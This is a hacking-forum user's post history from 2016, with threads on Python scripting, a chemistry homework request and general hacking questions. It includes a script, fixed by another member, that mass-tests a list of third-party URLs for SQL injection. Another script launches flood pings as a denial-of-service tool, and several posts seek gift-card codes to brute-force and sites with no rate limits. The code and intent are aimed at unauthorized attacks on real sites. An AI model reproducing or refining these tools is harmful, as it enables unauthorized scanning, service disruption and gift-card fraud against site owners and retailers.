Messages - Coto

1
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 09:51:09 pm »
The readlines() function puts the lines of a file into a list, so when you do:
Code: [Select]
r = requests.get(content+"'")
You are trying to add the string " ' " to a list and request the whole list. I wonder how you didn't get an error there?
Basically, you should do something like this:

Code: [Select]
import requests
with open("URL_list.txt", 'r') as f:
    content = f.readlines()

for url in content:
    # strip() strips newline characters.
    if "SQL" in requests.get(url.strip()+"'").content:
        print '\033[1;31mVulnerable!'
    else:
        print '\033[1;32mFailed.'



Using a with statement when opening a file is good practice because it handles closing the file etc.
That..
Code: [Select]
str(tosearch)
..doesn't do anything. Or at least it doesn't save what it does anywhere; also it's pointless because the 'tosearch' variable is a string already.


Thanks mate, that worked! However, after a few executions of the File, I'm facing this output when I run the .py file from Terminal:

Code: [Select]
Traceback (most recent call last):
  File "rgsr.py", line 7, in <module>
    if "SQL" in requests.get(url.strip()+"'").content:
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 67, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 53, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 468, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 576, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 437, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='www.angelvestgroup.com', port=80): Max retries exceeded with url: /info.php?id=1' (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0x7fa2d5a5ca50>: Failed to establish a new connection: [Errno -2] Name or service not known',))

EDIT: Never mind, after paying close attention to the output, I saw that the link just doesn't exist. Is there a way I can add an elif statement to my Code, to say if the Site doesn't exist at all?

2
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 06:23:35 pm »
What do you mean?

I'm just trying to make the program check first line, add a ' at the end of it, and if the "SQL" exists in the Page Sources, print "Valid".

If not, print "Failed".

After doing it with the first line, then do it to the second line, third etc.

3
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 05:18:59 pm »
Nope, again, still only reading first line.

4
Beginner's Corner / SQL Injection Vulnerability in Python
« on: February 19, 2016, 04:53:47 pm »
Please use the following template:

[Problem]

I can't get this Python script to work.

[Background]

The Program reads every line from File and checks whether it's vulnerable to SQL Injections or not.

[Things I have tried]

Editing the Code a bit.

[Where I am stuck]

Can't get it to import from URL_list.txt and read each line and perform the check for vulnerability on each line (of the File containing the URLs).

My Python 2.7 Code:

Code: [Select]
import requests

with open("URL_list.txt") as f:
    content = f.readlines()

r = requests.get(content+"'")
if "SQL" in (r.content):
    print '\033[1;31mVulnerable!'
else:
    print '\033[1;32mFailed.'

5
Hacking and Security / Re: Brute-Forcing Gift-Cards Codes?
« on: February 07, 2016, 05:57:10 pm »
I wasn't planning on doing this using Hydra, I have made a Python Script that works just as fine. Maybe Hydra is actually faster on that, but if you've got the time to wait, it could work. I haven't thought about the Proxy though.

I'm actually looking for Sites that allow you to redeem gift cards that don't require big codes, just small ones and that don't require you to change your IP every time/ask for captcha. If you can find any, let me know! :)

6
Hacking and Security / Re: Where to get started?
« on: January 27, 2016, 10:49:04 pm »
Just because others are calling you stupid, it doesn't make them smart(er than you). Begin with the reason you want to learn how to Hack. If your current Goal for example is to crack a Wi-Fi password, learn that, or whatever. That's what got me into hacking in the first place; after years I achieved this goal, but while trying, I learned lots of things.

7
Hacking and Security / Re: Brute-Forcing Gift-Cards Codes?
« on: January 20, 2016, 07:05:13 pm »
Thanks, what about other Retailer's Gift-Card's systems? When you buy for example an iTunes Gift-Card from the Store next to your house, does the guy working there enable it as soon as you purchase it, or something?

8
Hacking and Security / Brute-Forcing Gift-Cards Codes?
« on: January 19, 2016, 03:46:33 pm »
I was looking at Amazon's Gift-Card System. I know there are many Major Companies that sell you Gift-Cards for their Services. I was wondering whether those Gift-Card Codes existed, so you could guess it and apply it? Or when you purchase the Gift-Card it gets enabled to be able to be redeemed by the buyer? If not, couldn't someone just brute-force Amazon's Gift Card System? For example, input the Wordlist which would have Amazon's Gift-Card Code Format, then get tons of Gift-Cards, meaning it would make the Brute-Forcer rich...

So, I was wondering whether Gift-Cards Codes get enabled on Purchase or not.

9
Beginner's Corner / Ping of Death - Works or not?
« on: January 17, 2016, 05:08:02 pm »
I had recently heard about "Ping of Death". It was known to act like a DDoS tool, by Pinging and sending threads to the victim Server.

I made something like that in Python:

Code: [Select]
#!/bin/sh

import time
import requests
import os

server = raw_input("Server to perform the DDoS Attack on [IP/URL]: ")
connections = input("Connections [1-100]: ")
downtime = float(raw_input("Downtime [in seconds]: "))

if '.' in server:
for x in range(0, connections):
os.system("gnome-terminal -e 'ping -f %s'" % str(server))
else:
print(server+ "is not a valid IP/URL.")
exit()

time.sleep(downtime)
print(" ")
print("\033[1;32;40mAttack has been successfully completed!")
print(" ")
print("\033[1;31;40mServer's Downtime:"),
print("\033[1;35;40m%s") % (downtime)
print(" ")
print("\033[1;36;40mSaving Output..."),
try:
f = open('Attack_History.txt','a')
except:
f = open('Attack_History.txt','w')
f.write('Server: '+server+'\n')
f.write('Connections: %s''\n' % str(connections))
f.write('Downtime: %s Seconds''\n' % str(downtime))
f.write("+------------------------+")
f.write('\n')
f.close()
time.sleep(5)
os.system("pkill terminal")

But it doesn't seem to work, even on very "weak" Websites, that I've tried DoSing with other ways and have worked. I opened up EtherApe and noticed that all the attacks were reflected on me. Just like a distributed reflective denial of service. Why does this happen? And is it possible to take down a site by using Ping?

10
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 08:54:15 pm »
Also, what if I also want to specify an input with Timeout?

This is what I've done:

server = raw_input("Server to perform the Ping on [IP/URL]: ")
timeout = raw_input("Ping length time [Seconds]: ")

os.system("gnome-terminal -e 'ping -w %d -i 2 %s'" % str(server) % str(timeout))

So, basically, I also wanna fit the timeout string too. How do I do that? (The above code obv. doesn't work)

Also, how do I get all that code into a

for x in range(0, 3): ? So that it would open 3 Terminal windows and do that Ping.

It surprisingly didn't work for me for some reason, whereas it just did before...  :o

11
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 07:57:57 pm »
Yea, I'm using Python 2.7, not 3.

12
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 01:41:31 pm »
I won't tell you what you did wrong because you obv. didn't do any basic debugging of your script.
However, I recommend that you print the stuff you pass to the os.system() call. If you are done with that, come back here and post your working code, as I see it will have some room for improvements.

I've got everything to work. What's troubling me, however, is I want the script to ask for the URL to ping, and use what I've responded here:

os.system("gnome-terminal -e 'ping -i 2' + str(server)")
as in
os.system("gnome-terminal -e 'ping -i 2' + [URL I responded to the Terminal asking for the URL to ping]")

13
Scripting Languages / Python Code Help
« on: January 16, 2016, 12:19:15 pm »
Hey, folks. I wanted to make a script, where you input a URL, and the Terminal Pings it.

My current Code:

Code: [Select]
server = input("Server to perform the Ping on: ")

os.system("gnome-terminal -e 'ping -i 2' + str(server)")

But it doesn't work, no matter what I try... I want it to work like the way I've coded it, above, because there's a bunch more lines behind this, but this is where I need help.

Thanks.

14
Science / Re: [URGENT] Chemistry Homework Help
« on: January 11, 2016, 12:24:22 am »
Ty m8!!

I'm sure I'll get an A+!  ;D ;D ;D

15
Science / [URGENT] Chemistry Homework Help
« on: January 10, 2016, 08:55:34 pm »
Alright, I got this exercise in Chemistry, I need to have it finished by tomorrow or else I might fail the subject... If anyone could PLEASE fill the table below, that would be amazing and I'd really appreciate it..

I assume most of you would know what to do, unlike me (P.S. Please don't bother explaining to me how to do all this, I need this finished ASAP, like right now...) :P

OH- | O-2 | Cl- | Br- | F- | I- | NO3- | CO3-2 | SO4-2 | PO4-3 | CN- | HCO3- | MnO4-
H+
K+
Na+
Ag+
Ba+2
Ca+2
Mg+2
Zn+2
Al+3
Fe+2
Fe+3
ZH4+2
